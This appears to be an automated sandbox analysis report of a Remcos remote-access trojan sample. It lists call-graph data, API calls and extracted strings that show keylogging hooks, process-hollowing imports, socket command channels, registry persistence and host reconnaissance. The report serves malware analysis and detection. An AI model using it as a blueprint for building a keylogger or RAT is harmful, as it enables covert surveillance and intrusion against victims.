48344 40322e 48343->48344 48353 403618 48344->48353 48346 40323b 48346->48163 48348 40326e 48347->48348 48349 402252 11 API calls 48348->48349 48350 403288 48349->48350 48351 402336 11 API calls 48350->48351 48352 403031 48351->48352 48352->47705 48354 403626 48353->48354 48355 403644 48354->48355 48356 40362c 48354->48356 48358 40369e 48355->48358 48360 40365c 
48355->48360 48364 4036a6 28 API calls 48356->48364 48365 4028a4 22 API calls 48358->48365 48362 4027e6 28 API calls 48360->48362 48363 403642 48360->48363 48362->48363 48363->48346 48364->48363 48367 404186 48366->48367 48368 402252 11 API calls 48367->48368 48369 404191 48368->48369 48377 4041bc 48369->48377 48372 4042fc 48388 404353 48372->48388 48374 40430a 48375 403262 11 API calls 48374->48375 48376 404319 48375->48376 48376->47713 48378 4041c8 48377->48378 48381 4041d9 48378->48381 48380 40419c 48380->48372 48382 4041e9 48381->48382 48383 404206 48382->48383 48384 4041ef 48382->48384 48385 4027e6 28 API calls 48383->48385 48386 404267 28 API calls 48384->48386 48387 404204 48385->48387 48386->48387 48387->48380 48389 40435f 48388->48389 48392 404371 48389->48392 48391 40436d 48391->48374 48393 40437f 48392->48393 48394 404385 48393->48394 48395 40439e 48393->48395 48456 4034e6 28 API calls 48394->48456 48396 402888 22 API calls 48395->48396 48397 4043a6 48396->48397 48399 404419 48397->48399 48400 4043bf 48397->48400 48457 4028a4 22 API calls 48399->48457 48402 4027e6 28 API calls 48400->48402 48411 40439c 48400->48411 48402->48411 48411->48391 48456->48411 48464 43aa9a 48458->48464 48462 4138b9 48461->48462 48463 41388f RegSetValueExA RegCloseKey 48461->48463 48462->47728 48463->48462 48467 43aa1b 48464->48467 48466 40170d 48466->47731 48468 43aa2a 48467->48468 48469 43aa3e 48467->48469 48473 4405dd 20 API calls __dosmaperr 48468->48473 48472 43aa2f __alldvrm _strftime 48469->48472 48474 448957 11 API calls 2 library calls 48469->48474 48472->48466 48473->48472 48474->48472 48478 41b8f9 ctype ___scrt_fastfail 48475->48478 48476 402093 28 API calls 48477 414f49 48476->48477 48477->47738 48478->48476 48479->47755 48481 414f02 getaddrinfo WSASetLastError 48480->48481 48482 414ef8 48480->48482 48481->47782 48658 414d86 29 API calls ___std_exception_copy 48482->48658 48484 414efd 48484->48481 48486 4020df 11 API calls 48485->48486 48487 41caf5 FormatMessageA 
48486->48487 48488 41cb13 48487->48488 48490 41cb21 48487->48490 48489 402093 28 API calls 48488->48489 48491 41cb1f 48489->48491 48492 41cb2c LocalFree 48490->48492 48494 401fd8 11 API calls 48491->48494 48493 402055 11 API calls 48492->48493 48493->48491 48495 41cb48 48494->48495 48495->47782 48497 404846 socket 48496->48497 48498 404839 48496->48498 48499 404860 CreateEventW 48497->48499 48500 404842 48497->48500 48659 40489e WSAStartup 48498->48659 48499->47782 48500->47782 48502 40483e 48502->48497 48502->48500 48504 404f65 48503->48504 48505 404fea 48503->48505 48506 404f6e 48504->48506 48507 404fc0 CreateEventA CreateThread 48504->48507 48508 404f7d GetLocalTime 48504->48508 48505->47782 48506->48507 48507->48505 48661 405150 48507->48661 48509 41bb8e 28 API calls 48508->48509 48510 404f91 48509->48510 48660 4052fd 28 API calls 48510->48660 48519 404a1b 48518->48519 48520 4048ee 48518->48520 48521 40497e 48519->48521 48522 404a21 WSAGetLastError 48519->48522 48520->48521 48523 404923 48520->48523 48526 40531e 28 API calls 48520->48526 48521->47782 48522->48521 48524 404a31 48522->48524 48665 420c60 27 API calls 48523->48665 48527 404932 48524->48527 48528 404a36 48524->48528 48530 40490f 48526->48530 48533 402093 28 API calls 48527->48533 48531 41cae1 30 API calls 48528->48531 48529 40492b 48529->48527 48532 404941 48529->48532 48534 402093 28 API calls 48530->48534 48535 404a40 48531->48535 48543 404950 48532->48543 48544 404987 48532->48544 48536 404a80 48533->48536 48537 40491e 48534->48537 48670 4052fd 28 API calls 48535->48670 48540 402093 28 API calls 48536->48540 48541 41b4ef 80 API calls 48537->48541 48545 404a8f 48540->48545 48541->48523 48548 402093 28 API calls 48543->48548 48667 421a40 54 API calls 48544->48667 48549 41b4ef 80 API calls 48545->48549 48552 40495f 48548->48552 48549->48521 48551 40498f 48554 4049c4 48551->48554 48555 404994 48551->48555 48556 402093 28 API calls 48552->48556 48669 420e06 28 API calls 48554->48669 48558 402093 28 
API calls 48555->48558 48559 40496e 48556->48559 48561 4049a3 48558->48561 48562 41b4ef 80 API calls 48559->48562 48565 402093 28 API calls 48561->48565 48566 404973 48562->48566 48563 4049cc 48564 4049f9 CreateEventW CreateEventW 48563->48564 48567 402093 28 API calls 48563->48567 48564->48521 48568 4049b2 48565->48568 48666 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48566->48666 48569 4049e2 48567->48569 48570 41b4ef 80 API calls 48568->48570 48572 402093 28 API calls 48569->48572 48573 4049b7 48570->48573 48574 4049f1 48572->48574 48668 4210b2 52 API calls 48573->48668 48576 41b4ef 80 API calls 48574->48576 48577 4049f6 48576->48577 48577->48564 48671 41b7b6 GlobalMemoryStatusEx 48578->48671 48580 41b7f5 48580->47782 48672 414580 48581->48672 48585 40dda5 48584->48585 48586 4134ff 3 API calls 48585->48586 48588 40ddac 48586->48588 48587 40ddc4 48587->47782 48588->48587 48589 413549 3 API calls 48588->48589 48589->48587 48591 4020b7 28 API calls 48590->48591 48592 41bc57 48591->48592 48592->47782 48594 41bafc GetTickCount 48593->48594 48594->47782 48596 436e90 ___scrt_fastfail 48595->48596 48597 41bab5 GetForegroundWindow GetWindowTextW 48596->48597 48598 40417e 28 API calls 48597->48598 48599 41badf 48598->48599 48599->47782 48601 402093 28 API calls 48600->48601 48602 40f8f6 48601->48602 48602->47782 48604 4020df 11 API calls 48603->48604 48605 402f3d 48604->48605 48606 4032a0 28 API calls 48605->48606 48607 402f59 48606->48607 48607->47782 48609 404ab4 48608->48609 48702 40520c 48609->48702 48611 404ac9 ctype 48612 404b40 WaitForSingleObject 48611->48612 48613 404b20 48611->48613 48615 404b56 48612->48615 48614 404b32 send 48613->48614 48616 404b7b 48614->48616 48708 42103a 54 API calls 48615->48708 48618 401fd8 11 API calls 48616->48618 48620 404b83 48618->48620 48619 404b69 SetEvent 48619->48616 48621 401fd8 11 API calls 48620->48621 48622 404b8b 48621->48622 48622->47782 48624 4020df 11 API calls 48623->48624 48625 404c27 
48624->48625 48626 4020df 11 API calls 48625->48626 48636 404c30 48626->48636 48627 43bd51 ___std_exception_copy 21 API calls 48627->48636 48629 4020b7 28 API calls 48629->48636 48630 404ca1 48632 404e26 99 API calls 48630->48632 48631 401fe2 28 API calls 48631->48636 48633 404ca8 48632->48633 48635 401fd8 11 API calls 48633->48635 48634 401fd8 11 API calls 48634->48636 48637 404cb1 48635->48637 48636->48627 48636->48629 48636->48630 48636->48631 48636->48634 48639 404c84 48636->48639 48727 404b96 48636->48727 48638 401fd8 11 API calls 48637->48638 48640 404cba 48638->48640 48733 404cc3 32 API calls 48639->48733 48640->47782 48643 404e40 SetEvent CloseHandle 48642->48643 48644 404e57 closesocket 48642->48644 48645 404ed8 48643->48645 48646 404e64 48644->48646 48645->47782 48647 404e7a 48646->48647 48735 4050e4 84 API calls 48646->48735 48648 404e8c WaitForSingleObject 48647->48648 48649 404ece SetEvent CloseHandle 48647->48649 48736 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48648->48736 48649->48645 48652 404e9b SetEvent WaitForSingleObject 48737 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48652->48737 48654 404eb3 SetEvent CloseHandle CloseHandle 48654->48649 48655->47782 48657->47782 48658->48484 48659->48502 48664 40515c 102 API calls 48661->48664 48663 405159 48664->48663 48665->48529 48666->48521 48667->48551 48668->48566 48669->48563 48671->48580 48675 414553 48672->48675 48676 414568 ___scrt_initialize_default_local_stdio_options 48675->48676 48679 43f79d 48676->48679 48682 43c4f0 48679->48682 48683 43c530 48682->48683 48684 43c518 48682->48684 48683->48684 48685 43c538 48683->48685 48697 4405dd 20 API calls __dosmaperr 48684->48697 48698 43a7b7 36 API calls 2 library calls 48685->48698 48688 43c548 48699 43cc76 20 API calls 2 library calls 48688->48699 48689 43c51d _strftime 48690 434fcb ___crtLCMapStringA 5 API calls 48689->48690 48692 414576 48690->48692 48692->47782 48693 43c5c0 48700 43d2e4 51 API 
calls 3 library calls 48693->48700 48696 43c5cb 48701 43cce0 20 API calls _free 48696->48701 48697->48689 48698->48688 48699->48693 48700->48696 48701->48689 48703 405214 48702->48703 48704 4023ce 11 API calls 48703->48704 48705 40521f 48704->48705 48709 405234 48705->48709 48707 40522e 48707->48611 48708->48619 48710 405240 48709->48710 48711 40526e 48709->48711 48725 4028e8 28 API calls 48710->48725 48726 4028a4 22 API calls 48711->48726 48715 40524a 48715->48707 48725->48715 48728 404ba0 WaitForSingleObject 48727->48728 48729 404bcd recv 48727->48729 48734 421076 54 API calls 48728->48734 48731 404be0 48729->48731 48731->48636 48732 404bbc SetEvent 48732->48731 48733->48636 48734->48732 48735->48647 48736->48652 48737->48654 48739->47847 48740->47873 48741->47872 48742->47861 48743->47865 48744->47871 48745->47903 48750 40f7c2 48748->48750 48749 413549 3 API calls 48749->48750 48750->48749 48751 40f866 48750->48751 48754 40f856 Sleep 48750->48754 48770 40f7f4 48750->48770 48753 40905c 28 API calls 48751->48753 48752 40905c 28 API calls 48752->48770 48756 40f871 48753->48756 48754->48750 48755 41bc5e 28 API calls 48755->48770 48758 41bc5e 28 API calls 48756->48758 48759 40f87d 48758->48759 48783 413814 14 API calls 48759->48783 48762 401f09 11 API calls 48762->48770 48763 40f890 48764 401f09 11 API calls 48763->48764 48766 40f89c 48764->48766 48765 402093 28 API calls 48765->48770 48767 402093 28 API calls 48766->48767 48768 40f8ad 48767->48768 48771 41376f 14 API calls 48768->48771 48769 41376f 14 API calls 48769->48770 48770->48752 48770->48754 48770->48755 48770->48762 48770->48765 48770->48769 48781 40d096 112 API calls ___scrt_fastfail 48770->48781 48782 413814 14 API calls 48770->48782 48772 40f8c0 48771->48772 48784 412850 TerminateProcess WaitForSingleObject 48772->48784 48774 40f8c8 ExitProcess 48785 4127ee 62 API calls 48780->48785 48782->48770 48783->48763 48784->48774 48786 40165e 48787 401666 48786->48787 48788 401669 48786->48788 48789 4016a8 
48788->48789 48792 401696 48788->48792 48790 4344ea new 22 API calls 48789->48790 48791 40169c 48790->48791 48793 4344ea new 22 API calls 48792->48793 48793->48791

                                        Control-flow Graph

                                        APIs
                                        • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                        • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                        • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                        • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                        • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                        • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                        • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                        • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                        • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                        • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                        • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad$HandleModule
                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                        • API String ID: 4236061018-3687161714
                                        • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                        • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                        • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                        • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

                                        Control-flow Graph

                                        APIs
                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                        • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                        • GetLastError.KERNEL32 ref: 0040A2ED
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                        • TranslateMessage.USER32(?), ref: 0040A34A
                                        • DispatchMessageA.USER32(?), ref: 0040A355
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                        • String ID: Keylogger initialization failure: error $`#v
                                        • API String ID: 3219506041-3226811161
                                        • Opcode ID: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                                        • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                        • Opcode Fuzzy Hash: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                                        • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00413549: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00413569
                                          • Part of subcall function 00413549: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                          • Part of subcall function 00413549: RegCloseKey.KERNELBASE(?), ref: 00413592
                                        • Sleep.KERNELBASE(00000BB8), ref: 0040F85B
                                        • ExitProcess.KERNEL32 ref: 0040F8CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                        • String ID: 4.9.4 Pro$override$pth_unenc
                                        • API String ID: 2281282204-930821335
                                        • Opcode ID: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                                        • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                        • Opcode Fuzzy Hash: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                                        • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF

                                        Control-flow Graph

                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 00404F81
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                        Strings
                                        • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Create$EventLocalThreadTime
                                        • String ID: KeepAlive | Enabled | Timeout:
                                        • API String ID: 2532271599-1507639952
                                        • Opcode ID: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
                                        • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                        • Opcode Fuzzy Hash: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
                                        • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                        • recv.WS2_32(?,?,?,00000000), ref: 00404BDA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EventObjectSingleWaitrecv
                                        • String ID:
                                        • API String ID: 311754179-0
                                        • Opcode ID: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                        • Instruction ID: 1d69a7fd2e689c68354a0251ffa64299bfe08f5f9c70e8df09ea9ad7bb005133
                                        • Opcode Fuzzy Hash: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                        • Instruction Fuzzy Hash: 00F08236108213FFD7059F10EC09E4AFB62FB84721F10862AF510522B08771FC21DBA5
                                        APIs
                                        • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,004750E4), ref: 0041B62A
                                        • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Name$ComputerUser
                                        • String ID:
                                        • API String ID: 4229901323-0
                                        • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                        • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                        • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                        • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                        APIs
                                        • GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                        • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                        • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                        • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 0040E9EE
                                          • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                        • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                        • API String ID: 2830904901-2361045106
                                        • Opcode ID: 9dbae48a280d3333a9d77f8d0747098945c713f3f6b336d54fdc187ddd26b95e
                                        • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                        • Opcode Fuzzy Hash: 9dbae48a280d3333a9d77f8d0747098945c713f3f6b336d54fdc187ddd26b95e
                                        • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

                                        Control-flow Graph

                                        APIs
                                        • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                        • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
